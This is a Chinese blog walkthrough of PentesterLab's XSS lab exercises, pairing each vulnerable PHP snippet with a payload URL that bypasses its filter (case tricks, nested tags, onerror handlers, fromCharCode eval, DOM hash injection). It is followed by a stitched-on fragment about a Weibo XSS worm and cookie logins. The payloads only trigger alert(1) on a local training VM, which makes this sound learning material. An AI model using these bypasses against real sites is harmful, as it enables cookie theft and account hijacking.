pentesterlab xss漏洞分析
- - JavaScript - Web前端 - ITeye博客pentesterlab简介. pentesterlab官方定义自己是一个简单又十分有效学习渗透测试的演练平台. pentesterlab环境搭建. 官方提供了一个基于debian6的镜像,官网下载镜像,使用vmware建立一个虚拟机,启动即可. ps:官方文档建议做一个host绑定,方便后面使用.
192.168.1.100 vulnerable # 具体ip可以在虚拟机中使用ifconfig查看
// <script>alert(1);</script> http://vulnerable/xss/example1.php?name=%3Cscript%3Ealert(1)%3C/script%3E
<?php echo $_GET["name"]; ?>
// <sCript>alert(1);</scrIpt> http://vulnerable/xss/example2.php?name=%3CsCript%3Ealert(1);%3C/scrIpt%3E
<?php $name = $_GET["name"]; $name = preg_replace("/<script>/", "", $name); $name = preg_replace("/<\/script>/", "", $name); echo $name; ?>
// <sCr<scriPt>ipt>alert(1)</scr</scRipt>Ipt> http://vulnerable/xss/example3.php?name=%3CsCr%3CscriPt%3Eipt%3Ealert(1)%3C/scr%3C/scRipt%3EIpt%3E
<?php $name = $_GET["name"]; $name = preg_replace("/<script>/i", "", $name); $name = preg_replace("/<\/script>/i", "", $name); echo $name; ?>
// <img src='a' onerror='alert(1)' /> http://vulnerable/xss/example4.php?name=%3Cimg%20src='a'%20onerror='alert(1)'%20/%3E
<?php if(preg_match('/script/i', $_GET["name"])) { die("error"); } ?>
// <iMg src=N onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,112,111,114,117,105,110,39,41))"> http://vulnerable/xss/example5.php?name=%3CiMg%20src=N%20onerror=%22eval(String.fromCharCode(97,108,101,114,116,40,39,112,111,114,117,105,110,39,41))%22%3E
<?php if(preg_match('/alert/i', $_GET["name"])) { die("error"); } ?>
// ";b=alert(1);eval(b);// http://vulnerable/xss/example6.php?name=%22;b=alert(1);eval(b);//
<script> var $a = "<?php echo $_GET["name"]; ?>"; <script>
// ';b=alert(1);eval(b);// http://vulnerable/xss/example7.php?name=';b=alert(1);eval(b);//
<script> var $a = "<?php echo htmlentities($_GET["name"]); ?>"; <script>
// /"method="POST"><script>alert(1)</script> http://vulnerable/xss/example8.php/%22method=%22POST%22%3E%3Cscript%3Ealert(1)%3C/script%3E
<?php if(isset($_POST["name"])) { echo "HELLO ".htmlentities($_POST["name"]); } ?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST"> Your name:<input type="text" name="name" /> <input type="submit" name="submit" />
// #<script>alert(1)</script> http://vulnerable/xss/example9.php#<script>alert(1)</script>
<script> document.write(location.hash.substring(1)); </script>
帮我写一个能提取【原创】腾讯微博的XSS攻击漏洞
- sec314 - 博客园-首页原创精华区相信大家都知道新浪微博在6月28日发生的XSS攻击事件了吧. 在那晚里,大量新浪微博用户自动发送微博信息和自动关注一名叫“hellosamy“的用户. 究竟XSS攻击为什么能有这么大的威力. 现在很多网站都采用了Cookie记录访问者的登录状态,在进行某些功能操作时(比如:发微博),服务器判断用户的Cookie记录的登录状态,如果用户是登录状态的则允许操作.